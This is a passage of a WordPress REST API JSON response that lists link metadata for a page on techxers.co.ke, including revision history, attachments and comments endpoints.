p\/v2\/comments?post=566"}],"version-history":[{"count":82,"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/pages\/566\/revisions"}],"predecessor-version":[{"id":829,"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/pages\/566\/revisions\/829"}],"wp:attachment":[{"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/media?parent=566"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}